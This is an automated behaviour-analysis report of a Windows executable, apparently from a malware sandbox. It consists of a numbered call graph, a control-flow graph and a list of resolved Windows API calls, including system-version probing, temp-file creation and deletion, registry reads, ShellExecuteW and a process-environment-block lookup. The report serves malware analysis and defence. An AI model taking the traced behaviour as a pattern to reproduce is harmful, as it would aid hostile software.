98116 1493a7 98115->98116 98119 e6350 98116->98119 98118->97643 98120 124a51 98119->98120 98121 e6362 98119->98121 98138 e4a88 22 API calls __fread_nolock 98120->98138 98128 e6373 98121->98128 98124 e636e 98124->98111 98125 124a5b 98126 ea8c7 22 API calls 98125->98126 98127 124a67 98125->98127 98126->98127 98129 e63b6 __fread_nolock 98128->98129 98131 e6382 98128->98131 98129->98124 98130 124a82 98133 ffddb 22 API calls 98130->98133 98131->98129 98131->98130 98132 e63a9 98131->98132 98134 ea587 22 API calls 98132->98134 98135 124a91 98133->98135 98134->98129 98136 ffe0b 22 API calls 98135->98136 98137 124ac5 __fread_nolock 98136->98137 98138->98125 98140 ea961 22 API calls 98139->98140 98141 e5275 98140->98141 98142 ea961 22 API calls 98141->98142 98143 e527d 98142->98143 98144 ea961 22 API calls 98143->98144 98145 e5285 98144->98145 98146 ea961 22 API calls 98145->98146 98147 e528d 98146->98147 98148 123df5 98147->98148 98149 e52c1 98147->98149 98150 ea8c7 22 API calls 98148->98150 98151 e6d25 22 API calls 98149->98151 98152 123dfe 98150->98152 98153 e52cf 98151->98153 98154 ea6c3 22 API calls 98152->98154 98155 e93b2 22 API calls 98153->98155 98157 e5304 98154->98157 98156 e52d9 98155->98156 98156->98157 98158 e6d25 22 API calls 98156->98158 98159 e5325 98157->98159 98173 e5349 98157->98173 98176 123e20 98157->98176 98161 e52fa 98158->98161 98163 e4c6d 22 API calls 98159->98163 98159->98173 98160 e6d25 22 API calls 98165 e535a 98160->98165 98162 e93b2 22 API calls 98161->98162 98162->98157 98169 e5332 98163->98169 98164 e6b57 22 API calls 98178 123ee0 98164->98178 98166 e5370 98165->98166 98170 ea8c7 22 API calls 98165->98170 98168 e5384 98166->98168 98171 ea8c7 22 API calls 98166->98171 98167 e538f 98175 ea8c7 22 API calls 98167->98175 98180 e539a 98167->98180 98168->98167 98174 ea8c7 22 API calls 98168->98174 98172 e6d25 22 API calls 98169->98172 98169->98173 98170->98166 98171->98168 98172->98173 98173->98160 98174->98167 98175->98180 98176->98164 98177 e4c6d 22 API calls 98177->98178 98178->98173 98178->98177 98304 e49bd 22 API calls __fread_nolock 98178->98304 98180->97693 98182 eaec9 22 API calls 98181->98182 98183 e4c78 98182->98183 98183->97698 98183->97699 98185 14d7d8 98184->98185 98186 14d7f3 98185->98186 98187 14d7dd 98185->98187 98188 ea961 22 API calls 98186->98188 98189 ea8c7 22 API calls 98187->98189 98237 14d7ee 98187->98237 98190 14d7fb 98188->98190 98189->98237 98191 ea961 22 API calls 98190->98191 98192 14d803 98191->98192 98193 ea961 22 API calls 98192->98193 98194 14d80e 98193->98194 98195 ea961 22 API calls 98194->98195 98196 14d816 98195->98196 98197 ea961 22 API calls 98196->98197 98198 14d81e 98197->98198 98199 ea961 22 API calls 98198->98199 98200 14d826 98199->98200 98201 ea961 22 API calls 98200->98201 98202 14d82e 98201->98202 98203 ea961 22 API calls 98202->98203 98204 14d836 98203->98204 98205 e525f 22 API calls 98204->98205 98206 14d84d 98205->98206 98207 e525f 22 API calls 98206->98207 98208 14d866 98207->98208 98209 e4c6d 22 API calls 98208->98209 98210 14d872 98209->98210 98211 14d885 98210->98211 98212 e93b2 22 API calls 98210->98212 98213 e4c6d 22 API calls 98211->98213 98212->98211 98214 14d88e 98213->98214 98215 14d89e 98214->98215 98216 e93b2 22 API calls 98214->98216 98217 14d8b0 98215->98217 98218 ea8c7 22 API calls 98215->98218 98216->98215 98219 e6350 22 API calls 98217->98219 98218->98217 98220 14d8bb 98219->98220 98305 14d978 22 API calls 98220->98305 98222 14d8ca 98306 14d978 22 API calls 98222->98306 98224 14d8dd 98225 e4c6d 22 API calls 98224->98225 98226 14d8e7 98225->98226 98227 14d8ec 98226->98227 98228 14d8fe 98226->98228 98229 e33c6 22 API calls 98227->98229 98230 e4c6d 22 API calls 98228->98230 98231 14d8f9 98229->98231 98232 14d907 98230->98232 98235 e6350 22 API calls 98231->98235 98233 14d925 98232->98233 98234 e33c6 22 API calls 98232->98234 98236 e6350 22 API calls 98233->98236 98234->98231 98235->98233 98236->98237 98237->97715 98239 152954 __wsopen_s 98238->98239 98240 ffe0b 22 API calls 98239->98240 98241 152971 98240->98241 98242 e5722 22 API calls 98241->98242 98243 15297b 98242->98243 98244 15274e 27 API calls 98243->98244 98245 152986 98244->98245 98246 e511f 64 API calls 98245->98246 98247 15299b 98246->98247 98248 152a6c 98247->98248 98249 1529bf 98247->98249 98250 152e66 75 API calls 98248->98250 98251 152e66 75 API calls 98249->98251 98266 152a38 98250->98266 98252 1529c4 98251->98252 98256 152a75 messages 98252->98256 98311 10d583 26 API calls 98252->98311 98254 e50f5 40 API calls 98255 152a91 98254->98255 98257 e50f5 40 API calls 98255->98257 98256->97721 98259 152aa1 98257->98259 98258 1529ed 98312 10d583 26 API calls 98258->98312 98260 e50f5 40 API calls 98259->98260 98262 152abc 98260->98262 98263 e50f5 40 API calls 98262->98263 98264 152acc 98263->98264 98265 e50f5 40 API calls 98264->98265 98267 152ae7 98265->98267 98266->98254 98266->98256 98268 e50f5 40 API calls 98267->98268 98269 152af7 98268->98269 98270 e50f5 40 API calls 98269->98270 98271 152b07 98270->98271 98272 e50f5 40 API calls 98271->98272 98273 152b17 98272->98273 98307 153017 GetTempPathW GetTempFileNameW 98273->98307 98275 152b22 98276 10e5eb 29 API calls 98275->98276 98287 152b33 98276->98287 98277 152bed 98278 10e678 67 API calls 98277->98278 98279 152bf8 98278->98279 98281 152c12 98279->98281 98282 152bfe DeleteFileW 98279->98282 98280 e50f5 40 API calls 98280->98287 98283 152c91 CopyFileW 98281->98283 98289 152c18 98281->98289 98282->98256 98284 152ca7 DeleteFileW 98283->98284 98285 152cb9 DeleteFileW 98283->98285 98284->98256 98308 152fd8 CreateFileW 98285->98308 98287->98256 98287->98277 98287->98280 98288 10dbb3 65 API calls 98287->98288 98288->98287 98290 1522ce 79 API calls 98289->98290 98291 152c7c 98290->98291 98291->98285 98292 152c80 DeleteFileW 98291->98292 98292->98256 98294 e33dd 98293->98294 98295 1230bb 98293->98295 98313 e33ee 98294->98313 98297 ffddb 22 API calls 98295->98297 98299 1230c5 _wcslen 98297->98299 98298 e33e8 98298->97674 98300 ffe0b 22 API calls 98299->98300 98301 1230fe __fread_nolock 98300->98301 98302->97683 98303->97696 98304->98178 98305->98222 98306->98224 98307->98275 98309 153013 98308->98309 98310 152fff SetFileTime CloseHandle 98308->98310 98309->98256 98310->98309 98311->98258 98312->98266 98314 e33fe _wcslen 98313->98314 98315 12311d 98314->98315 98316 e3411 98314->98316 98318 ffddb 22 API calls 98315->98318 98317 ea587 22 API calls 98316->98317 98320 e341e __fread_nolock 98317->98320 98319 123127 98318->98319 98321 ffe0b 22 API calls 98319->98321 98320->98298 98322 123157 __fread_nolock 98321->98322 98324 14d4d5 98323->98324 98325 14dbdc GetFileAttributesW 98323->98325 98324->97537 98325->98324 98326 14dbe8 FindFirstFileW 98325->98326 98326->98324 98327 14dbf9 FindClose 98326->98327 98327->98324 98328->97769 98329->97776 98330->97774 98331->97782 98332->97782 98333 1822410 98347 1820000 98333->98347 98335 18224e8 98350 1822300 98335->98350 98353 1823510 GetPEB 98347->98353 98349 182068b 98349->98335 98351 1822309 Sleep 98350->98351 98352 1822317 98351->98352 98354 182353a 98353->98354 98354->98349 98355 118402 98360 1181be 98355->98360 98358 11842a 98365 1181ef try_get_first_available_module 98360->98365 98362 1183ee 98379 1127ec 26 API calls pre_c_initialization 98362->98379 98364 118343 98364->98358 98372 120984 98364->98372 98371 118338 98365->98371 98375 108e0b 40 API calls 2 library calls 98365->98375 98367 11838c 98367->98371 98376 108e0b 40 API calls 2 library calls 98367->98376 98369 1183ab 98369->98371 98377 108e0b 40 API calls 2 library calls 98369->98377 98371->98364 98378 10f2d9 20 API calls _abort 98371->98378 98380 120081 98372->98380 98374 12099f 98374->98358 98375->98367 98376->98369 98377->98371 98378->98362 98379->98364 98383 12008d ___BuildCatchObject 98380->98383 98381 12009b 98437 10f2d9 20 API calls _abort 98381->98437 98383->98381 98385 1200d4 98383->98385 98384 1200a0 98438 1127ec 26 API calls pre_c_initialization 98384->98438 98391 12065b 98385->98391 98390 1200aa __fread_nolock 98390->98374 98392 120678 98391->98392 98393 1206a6 98392->98393 98394 12068d 98392->98394 98440 115221 98393->98440 98454 10f2c6 20 API calls _abort 98394->98454 98397 120692 98455 10f2d9 20 API calls _abort 98397->98455 98398 1206ab 98399 1206b4 98398->98399 98400 1206cb 98398->98400 98456 10f2c6 20 API calls _abort 98399->98456 98453 12039a CreateFileW 98400->98453 98404 1200f8 98439 120121 LeaveCriticalSection __wsopen_s 98404->98439 98405 1206b9 98457 10f2d9 20 API calls _abort 98405->98457 98406 120781 GetFileType 98409 1207d3 98406->98409 98410 12078c GetLastError 98406->98410 98408 120756 GetLastError 98459 10f2a3 20 API calls 2 library calls 98408->98459 98462 11516a 21 API calls 3 library calls 98409->98462 98460 10f2a3 20 API calls 2 library calls 98410->98460 98411 120704 98411->98406 98411->98408 98458 12039a CreateFileW 98411->98458 98415 12079a CloseHandle 98415->98397 98418 1207c3 98415->98418 98417 120749 98417->98406 98417->98408 98461 10f2d9 20 API calls _abort 98418->98461 98419 1207f4 98421 120840 98419->98421 98463 1205ab 72 API calls 4 library calls 98419->98463 98426 12086d 98421->98426 98464 12014d 72 API calls 4 library calls 98421->98464 98422 1207c8 98422->98397 98425 120866 98425->98426 98427 12087e 98425->98427 98428 1186ae __wsopen_s 29 API calls 98426->98428 98427->98404 98429 1208fc CloseHandle 98427->98429 98428->98404 98465 12039a CreateFileW 98429->98465 98431 120927 98432 120931 GetLastError 98431->98432 98436 12095d 98431->98436 98466 10f2a3 20 API calls 2 library calls 98432->98466 98434 12093d 98467 115333 21 API calls 3 library calls 98434->98467 98436->98404 98437->98384 98438->98390 98439->98390 98441 11522d ___BuildCatchObject 98440->98441 98468 112f5e EnterCriticalSection 98441->98468 98444 115259 98445 115000 __wsopen_s 21 API calls 98444->98445 98447 11525e 98445->98447 98446 115234 98446->98444 98449 1152c7 EnterCriticalSection 98446->98449 98451 11527b 98446->98451 98447->98451 98472 115147 EnterCriticalSection 98447->98472 98448 1152a4 __fread_nolock 98448->98398 98449->98451 98452 1152d4 LeaveCriticalSection 98449->98452 98469 11532a 98451->98469 98452->98446 98453->98411 98454->98397 98455->98404 98456->98405 98457->98397 98458->98417 98459->98397 98460->98415 98461->98422 98462->98419 98463->98421 98464->98425 98465->98431 98466->98434 98467->98436 98468->98446 98473 112fa6 LeaveCriticalSection 98469->98473 98471 115331 98471->98448 98472->98451 98473->98471 98474 132a00 98491 ed7b0 messages 98474->98491 98475 edb11 PeekMessageW 98475->98491 98476 ed807 GetInputState 98476->98475 98476->98491 98477 ed9d5 98478 131cbe TranslateAcceleratorW 98478->98491 98480 edb8f PeekMessageW 98480->98491 98481 eda04 timeGetTime 98481->98491 98482 edb73 TranslateMessage DispatchMessageW 98482->98480 98483 edbaf Sleep 98490 edbc0 98483->98490 98484 132b74 Sleep 98484->98490 98485 fe551 timeGetTime 98485->98490 98486 131dda timeGetTime 98595 fe300 23 API calls 98486->98595 98489 132c0b GetExitCodeProcess 98494 132c21 WaitForSingleObject 98489->98494 98495 132c37 CloseHandle 98489->98495 98490->98477 98490->98485 98490->98489 98490->98491 98492 1729bf GetForegroundWindow 98490->98492 98496 132a31 98490->98496 98497 132ca9 Sleep 98490->98497 98598 165658 23 API calls 98490->98598 98599 14e97b QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 98490->98599 98600 14d4dc 47 API calls 98490->98600 98491->98475 98491->98476 98491->98477 98491->98478 98491->98480 98491->98481 98491->98482 98491->98483 98491->98484 98491->98486 98501 eec40 256 API calls 98491->98501 98503 f1310 256 API calls 98491->98503 98506 edd50 98491->98506 98513 edfd0 98491->98513 98536 ebf40 98491->98536 98594 fedf6 IsDialogMessageW GetClassLongW 98491->98594 98596 153a2a 23 API calls 98491->98596 98597 15359c 82 API calls __wsopen_s 98491->98597 98492->98490 98494->98491 98494->98495 98495->98490 98496->98477 98497->98491 98501->98491 98503->98491 98507 edd6f 98506->98507 98508 edd83 98506->98508 98601 ed260 256 API calls 2 library calls 98507->98601 98602 15359c 82 API calls __wsopen_s 98508->98602 98510 edd7a 98510->98491 98512 132f75 98512->98512 98514 ee010 98513->98514 98529 ee0dc messages 98514->98529 98605 100242 5 API calls __Init_thread_wait 98514->98605 98517 132fca 98519 ea961 22 API calls 98517->98519 98517->98529 98518 ea961 22 API calls 98518->98529 98520 132fe4 98519->98520 98606 1000a3 29 API calls __onexit 98520->98606 98524 132fee 98607 1001f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98524->98607 98526 eec40 256 API calls 98526->98529 98529->98518 98529->98526 98530 ea8c7 22 API calls 98529->98530 98531 f04f0 22 API calls 98529->98531 98532 ee3e1 98529->98532 98533 15359c 82 API calls 98529->98533 98603 ea81b 41 API calls 98529->98603 98604 fa308 256 API calls 98529->98604 98608 100242 5 API calls __Init_thread_wait 98529->98608 98609 1000a3 29 API calls __onexit 98529->98609 98610 1001f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98529->98610 98611 1647d4 256 API calls 98529->98611 98612 1668c1 256 API calls 98529->98612 98530->98529 98531->98529 98532->98491 98533->98529 98613 eadf0 98536->98613 98538 ebf9d 98539 1304b6 98538->98539 98540 ebfa9 98538->98540 98632 15359c 82 API calls __wsopen_s 98539->98632 98542 ec01e 98540->98542 98543 1304c6 98540->98543 98618 eac91 98542->98618 98633 15359c 82 API calls __wsopen_s 98543->98633 98546 147120 22 API calls 98590 ec039 __fread_nolock messages 98546->98590 98547 ec7da 98552 ffe0b 22 API calls 98547->98552 98551 ffddb 22 API calls 98551->98590 98557 ec808 __fread_nolock 98552->98557 98554 1304f5 98558 13055a 98554->98558 98634 fd217 256 API calls 98554->98634 98562 ffe0b 22 API calls 98557->98562 98579 ec603 98558->98579 98635 15359c 82 API calls __wsopen_s 98558->98635 98559 eec40 256 API calls 98559->98590 98560 eaf8a 22 API calls 98560->98590 98561 13091a 98645 153209 23 API calls 98561->98645 98591 ec350 __fread_nolock messages 98562->98591 98565 1308a5 98566 eec40 256 API calls 98565->98566 98568 1308cf 98566->98568 98568->98579 98643 ea81b 41 API calls 98568->98643 98569 130591 98636 15359c 82 API calls __wsopen_s 98569->98636 98572 1308f6 98644 15359c 82 API calls __wsopen_s 98572->98644 98576 ec237 98577 ec253 98576->98577 98578 ea8c7 22 API calls 98576->98578 98580 130976 98577->98580 98584 ec297 messages 98577->98584 98578->98577 98579->98491 98646 eaceb 23 API calls messages 98580->98646 98583 1309bf 98583->98579 98647 15359c 82 API calls __wsopen_s 98583->98647 98584->98583 98629 eaceb 23 API calls messages 98584->98629 98586 ec335 98586->98583 98588 ec342 98586->98588 98587 ebbe0 40 API calls 98587->98590 98630 ea704 22 API calls messages 98588->98630 98590->98546 98590->98547 98590->98551 98590->98554 98590->98557 98590->98558 98590->98559 98590->98560 98590->98561 98590->98565 98590->98569 98590->98572 98590->98576 98590->98579 98590->98583 98590->98587 98592 ffe0b 22 API calls 98590->98592 98622 ead81 98590->98622 98637 147099 22 API calls __fread_nolock 98590->98637 98638 165745 54 API calls _wcslen 98590->98638 98639 faa42 22 API calls messages 98590->98639 98640 14f05c 40 API calls 98590->98640 98641 ea993 41 API calls 98590->98641 98642 eaceb 23 API calls messages 98590->98642 98593 ec3ac 98591->98593 98631 fce17 22 API calls messages 98591->98631 98592->98590 98593->98491 98594->98491 98595->98491 98596->98491 98597->98491 98598->98490 98599->98490 98600->98490 98601->98510 98602->98512 98603->98529 98604->98529 98605->98517 98606->98524 98607->98529 98608->98529 98609->98529 98610->98529 98611->98529 98612->98529 98614 eae01 98613->98614 98617 eae1c messages 98613->98617 98615 eaec9 22 API calls 98614->98615 98616 eae09 CharUpperBuffW 98615->98616 98616->98617 98617->98538 98619 eacae 98618->98619 98621 eacd1 98619->98621 98648 15359c 82 API calls __wsopen_s 98619->98648 98621->98590 98623 12fadb 98622->98623 98624 ead92 98622->98624 98625 ffddb 22 API calls 98624->98625 98626 ead99 98625->98626 98649 eadcd 98626->98649 98629->98586 98630->98591 98631->98591 98632->98543 98633->98579 98634->98558 98635->98579 98636->98579 98637->98590 98638->98590 98639->98590 98640->98590 98641->98590 98642->98590 98643->98572 98644->98579 98645->98576 98646->98583 98647->98579 98648->98621 98653 eaddd 98649->98653 98650 eadb6 98650->98590 98651 ffddb 22 API calls 98651->98653 98652 ea961 22 API calls 98652->98653 98653->98650 98653->98651 98653->98652 98654 ea8c7 22 API calls 98653->98654 98655 eadcd 22 API calls 98653->98655 98654->98653 98655->98653 98656 e105b 98661 e344d 98656->98661 98658 e106a 98692 1000a3 29 API calls __onexit 98658->98692 98660 e1074 98662 e345d __wsopen_s 98661->98662 98663 ea961 22 API calls 98662->98663 98664 e3513 98663->98664 98693 e3a5a 98664->98693 98666 e351c 98700 e3357 98666->98700 98669 e33c6 22 API calls 98670 e3535 98669->98670 98671 e515f 22 API calls 98670->98671 98672 e3544 98671->98672 98673 ea961 22 API calls 98672->98673 98674 e354d 98673->98674 98675 ea6c3 22 API calls 98674->98675 98676 e3556 RegOpenKeyExW 98675->98676 98677 123176 RegQueryValueExW 98676->98677 98681 e3578 98676->98681 98678 123193 98677->98678 98679 12320c RegCloseKey 98677->98679 98680 ffe0b 22 API calls 98678->98680 98679->98681 98691 12321e _wcslen 98679->98691 98682 1231ac 98680->98682 98681->98658 98683 e5722 22 API calls 98682->98683 98685 1231b7 RegQueryValueExW 98683->98685 98684 e4c6d 22 API calls 98684->98691 98686 1231d4 98685->98686 98688 1231ee messages 98685->98688 98687 e6b57 22 API calls 98686->98687 98687->98688 98688->98679 98689 e9cb3 22 API calls 98689->98691 98690 e515f 22 API calls 98690->98691 98691->98681 98691->98684 98691->98689 98691->98690 98692->98660 98694 121f50 __wsopen_s 98693->98694 98695 e3a67 GetModuleFileNameW 98694->98695 98696 e9cb3 22 API calls 98695->98696 98697 e3a8d 98696->98697 98698 e3aa2 23 API calls 98697->98698 98699 e3a97 98698->98699 98699->98666 98701 121f50 __wsopen_s 98700->98701 98702 e3364 GetFullPathNameW 98701->98702 98703 e3386 98702->98703 98704 e6b57 22 API calls 98703->98704 98705 e33a4 98704->98705 98705->98669 98706 e1098 98711 e42de 98706->98711 98710 e10a7 98712 ea961 22 API calls 98711->98712 98713 e42f5 GetVersionExW 98712->98713 98714 e6b57 22 API calls 98713->98714 98715 e4342 98714->98715 98716 e93b2 22 API calls 98715->98716 98728 e4378 98715->98728 98717 e436c 98716->98717 98719 e37a0 22 API calls 98717->98719 98718 e441b GetCurrentProcess IsWow64Process 98720 e4437 98718->98720 98719->98728 98721 e444f LoadLibraryA 98720->98721 98722 123824 GetSystemInfo 98720->98722 98723 e449c GetSystemInfo 98721->98723 98724 e4460 GetProcAddress 98721->98724 98727 e4476 98723->98727 98724->98723 98726 e4470 GetNativeSystemInfo 98724->98726 98725 1237df 98726->98727 98729 e447a FreeLibrary 98727->98729 98730 e109d 98727->98730 98728->98718 98728->98725 98729->98730 98731 1000a3 29 API calls __onexit 98730->98731 98731->98710 98732 122ba5 98733 e2b25 98732->98733 98734 122baf 98732->98734 98760 e2b83 7 API calls 98733->98760 98735 e3a5a 24 API calls 98734->98735 98738 122bb8 98735->98738 98740 e9cb3 22 API calls 98738->98740 98742 122bc6 98740->98742 98741 e2b2f 98751 e2b44 98741->98751 98764 e3837 49 API calls ___scrt_fastfail 98741->98764 98743 122bf5 98742->98743 98744 122bce 98742->98744 98747 e33c6 22 API calls 98743->98747 98745 e33c6 22 API calls 98744->98745 98748 122bd9 98745->98748 98759 122bf1 GetForegroundWindow ShellExecuteW 98747->98759 98749 e6350 22 API calls 98748->98749 98755 122be7 98749->98755 98750 e2b5f 98756 e2b66 SetCurrentDirectoryW 98750->98756 98751->98750 98765 e30f2 Shell_NotifyIconW ___scrt_fastfail 98751->98765 98754 122c26 98754->98750 98757 e33c6 22 API calls 98755->98757 98758 e2b7a 98756->98758 98757->98759 98759->98754 98766 e2cd4 7 API calls 98760->98766 98762 e2b2a 98763 e2c63 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 98762->98763 98763->98741 98764->98751 98765->98750 98766->98762 98767 e3156 98770 e3170 98767->98770 98771 e3187 98770->98771 98772 e318c 98771->98772 98773 e31eb 98771->98773 98811 e31e9 98771->98811 98776 e3199 98772->98776 98777 e3265 PostQuitMessage 98772->98777 98774 122dfb 98773->98774 98775 e31f1 98773->98775 98819 e18e2 10 API calls 98774->98819 98779 e321d SetTimer RegisterWindowMessageW 98775->98779 98780 e31f8 98775->98780 98782 e31a4 98776->98782 98783 122e7c 98776->98783 98784 e316a 98777->98784 98778 e31d0 DefWindowProcW 98778->98784 98779->98784 98788 e3246 CreatePopupMenu 98779->98788 98785 122d9c 98780->98785 98786 e3201 KillTimer 98780->98786 98789 e31ae 98782->98789 98790 122e68 98782->98790 98825 14bf30 34 API calls ___scrt_fastfail 98783->98825 98798 122da1 98785->98798 98799 122dd7 MoveWindow 98785->98799 98815 e30f2 Shell_NotifyIconW ___scrt_fastfail 98786->98815 98787 122e1c 98820 fe499 42 API calls 98787->98820 98788->98784 98795 e31b9 98789->98795 98796 122e4d 98789->98796 98824 14c161 27 API calls ___scrt_fastfail 98790->98824 98802 e31c4 98795->98802 98803 e3253 98795->98803 98796->98778 98823 140ad7 22 API calls 98796->98823 98797 122e8e 98797->98778 98797->98784 98804 122dc6 SetFocus 98798->98804 98805 122da7 98798->98805 98799->98784 98800 e3214 98816 e3c50 DeleteObject DestroyWindow 98800->98816 98801 e3263 98801->98784 98802->98778 98821 e30f2 Shell_NotifyIconW ___scrt_fastfail 98802->98821 98817 e326f 44 API calls ___scrt_fastfail 98803->98817 98804->98784 98805->98802 98806 122db0 98805->98806 98818 e18e2 10 API calls 98806->98818 98811->98778 98813 122e41 98822 e3837 49 API calls ___scrt_fastfail 98813->98822 98815->98800 98816->98784 98817->98801 98818->98784 98819->98787 98820->98802 98821->98813 98822->98811 98823->98811 98824->98801 98825->98797 98826 e2e37 98827 ea961 22 API calls 98826->98827 98828 e2e4d 98827->98828 98905 e4ae3 98828->98905 98830 e2e6b 98831 e3a5a 24 API calls 98830->98831 98832 e2e7f 98831->98832 98833 e9cb3 22 API calls 98832->98833 98834 e2e8c 98833->98834 98835 e4ecb 94 API calls 98834->98835 98836 e2ea5 98835->98836 98837 122cb0 98836->98837 98838 e2ead 98836->98838 98839 152cf9 80 API calls 98837->98839 98842 ea8c7 22 API calls 98838->98842 98840 122cc3 98839->98840 98841 122ccf 98840->98841 98843 e4f39 68 API calls 98840->98843 98846 e4f39 68 API calls 98841->98846 98844 e2ec3 98842->98844 98843->98841 98919 e6f88 22 API calls 98844->98919 98848 122ce5 98846->98848 98847 e2ecf 98849 e9cb3 22 API calls 98847->98849 98935 e3084 22 API calls 98848->98935 98850 e2edc 98849->98850 98920 ea81b 41 API calls 98850->98920 98852 e2eec 98855 e9cb3 22 API calls 98852->98855 98854 122d02 98936 e3084 22 API calls 98854->98936 98857 e2f12 98855->98857 98921 ea81b 41 API calls 98857->98921 98858 122d1e 98860 e3a5a 24 API calls 98858->98860 98861 122d44 98860->98861 98937 e3084 22 API calls 98861->98937 98862 e2f21 98865 ea961 22 API calls 98862->98865 98864 122d50 98866 ea8c7 22 API calls 98864->98866 98867 e2f3f 98865->98867 98868 122d5e 98866->98868 98922 e3084 22 API calls 98867->98922 98938 e3084 22 API calls 98868->98938 98870 e2f4b 98923 104a28 40 API calls 3 library calls 98870->98923 98873 122d6d 98877 ea8c7 22 API calls 98873->98877 98874 e2f59 98874->98848 98875 e2f63 98874->98875 98924 104a28 40 API calls 3 library calls 98875->98924 98878 122d83 98877->98878 98939 e3084 22 API calls 98878->98939 98879 e2f6e 98879->98854 98881 e2f78 98879->98881 98925 104a28 40 API calls 3 library calls 98881->98925 98882 122d90 98884 e2f83 98884->98858 98885 e2f8d 98884->98885 98926 104a28 40 API calls 3 library calls 98885->98926 98887 e2f98 98888 e2fdc 98887->98888 98927 e3084 22 API calls 98887->98927 98888->98873 98889 e2fe8 98888->98889 98889->98882 98929 e63eb 22 API calls 98889->98929 98891 e2fbf 98893 ea8c7 22 API calls 98891->98893 98895 e2fcd 98893->98895 98894 e2ff8 98930 e6a50 22 API calls 98894->98930 98928 e3084 22 API calls 98895->98928 98898 e3006 98931 e70b0 23 API calls 98898->98931 98902 e3021 98903 e3065 98902->98903 98932 e6f88 22 API calls 98902->98932 98933 e70b0 23 API calls 98902->98933 98934 e3084 22 API calls 98902->98934 98906 e4af0 __wsopen_s 98905->98906 98907 e6b57 22 API calls 98906->98907 98908 e4b22 98906->98908 98907->98908 98909 e4c6d 22 API calls 98908->98909 98914 e4b58 98908->98914 98909->98908 98910 e9cb3 22 API calls 98912 e4c52 98910->98912 98911 e9cb3 22 API calls 98911->98914 98913 e515f 22 API calls 98912->98913 98916 e4c5e 98913->98916 98914->98911 98915 e515f 22 API calls 98914->98915 98917 e4c29 98914->98917 98918 e4c6d 22 API calls 98914->98918 98915->98914 98916->98830 98917->98910 98917->98916 98918->98914 98919->98847 98920->98852 98921->98862 98922->98870 98923->98874 98924->98879 98925->98884 98926->98887 98927->98891 98928->98888 98929->98894 98930->98898 98931->98902 98932->98902 98933->98902 98934->98902 98935->98854 98936->98858 98937->98864 98938->98873 98939->98882 98940 e1033 98945 e4c91 98940->98945 98944 e1042 98946 ea961 22 API calls 98945->98946 98947 e4cff 98946->98947 98953 e3af0 98947->98953 98949 e4d9c 98951 e1038 98949->98951 98956 e51f7 22 API calls __fread_nolock 98949->98956 98952 1000a3 29 API calls __onexit 98951->98952 98952->98944 98957 e3b1c 98953->98957 98956->98949 98958 e3b29 98957->98958 98959 e3b0f 98957->98959 98958->98959 98960 e3b30 RegOpenKeyExW 98958->98960 98959->98949 98960->98959 98961 e3b4a RegQueryValueExW 98960->98961 98962 e3b6b 98961->98962 98963 e3b80 RegCloseKey 98961->98963 98962->98963 98963->98959

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 234 e42de-e434d call ea961 GetVersionExW call e6b57 239 123617-12362a 234->239 240 e4353 234->240 242 12362b-12362f 239->242 241 e4355-e4357 240->241 243 e435d-e43bc call e93b2 call e37a0 241->243 244 123656 241->244 245 123632-12363e 242->245 246 123631 242->246 263 e43c2-e43c4 243->263 264 1237df-1237e6 243->264 250 12365d-123660 244->250 245->242 248 123640-123642 245->248 246->245 248->241 249 123648-12364f 248->249 249->239 252 123651 249->252 253 123666-1236a8 250->253 254 e441b-e4435 GetCurrentProcess IsWow64Process 250->254 252->244 253->254 258 1236ae-1236b1 253->258 256 e4437 254->256 257 e4494-e449a 254->257 260 e443d-e4449 256->260 257->260 261 1236b3-1236bd 258->261 262 1236db-1236e5 258->262 265 e444f-e445e LoadLibraryA 260->265 266 123824-123828 GetSystemInfo 260->266 267 1236ca-1236d6 261->267 268 1236bf-1236c5 261->268 270 1236e7-1236f3 262->270 271 1236f8-123702 262->271 263->250 269 e43ca-e43dd 263->269 272 123806-123809 264->272 273 1237e8 264->273 276 e449c-e44a6 GetSystemInfo 265->276 277 e4460-e446e GetProcAddress 265->277 267->254 268->254 278 123726-12372f 269->278 279 e43e3-e43e5 269->279 270->254 281 123704-123710 271->281 282 123715-123721 271->282 274 1237f4-1237fc 272->274 275 12380b-12381a 272->275 280 1237ee 273->280 274->272 275->280 285 12381c-123822 275->285 287 e4476-e4478 276->287 277->276 286 e4470-e4474 GetNativeSystemInfo 277->286 283 123731-123737 278->283 284 12373c-123748 278->284 288 e43eb-e43ee 279->288 289 12374d-123762 279->289 280->274 281->254 282->254 283->254 284->254 285->274 286->287 292 e447a-e447b FreeLibrary 287->292 293 e4481-e4493 287->293 294 123791-123794 288->294 295 e43f4-e440f 288->295 290 123764-12376a 289->290 291 12376f-12377b 289->291 290->254 291->254 292->293 294->254 296 12379a-1237c1 294->296 297 123780-12378c 295->297 298 e4415 295->298 299 1237c3-1237c9 296->299 300 1237ce-1237da 296->300 297->254 298->254 299->254 300->254
                                                                                              APIs
                                                                                              • GetVersionExW.KERNEL32(?), ref: 000E430D
                                                                                                • Part of subcall function 000E6B57: _wcslen.LIBCMT ref: 000E6B6A
                                                                                              • GetCurrentProcess.KERNEL32(?,0017CB64,00000000,?,?), ref: 000E4422
                                                                                              • IsWow64Process.KERNEL32(00000000,?,?), ref: 000E4429
                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 000E4454
                                                                                              • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 000E4466
                                                                                              • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 000E4474
                                                                                              • FreeLibrary.KERNEL32(00000000,?,?), ref: 000E447B
                                                                                              • GetSystemInfo.KERNEL32(?,?,?), ref: 000E44A0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
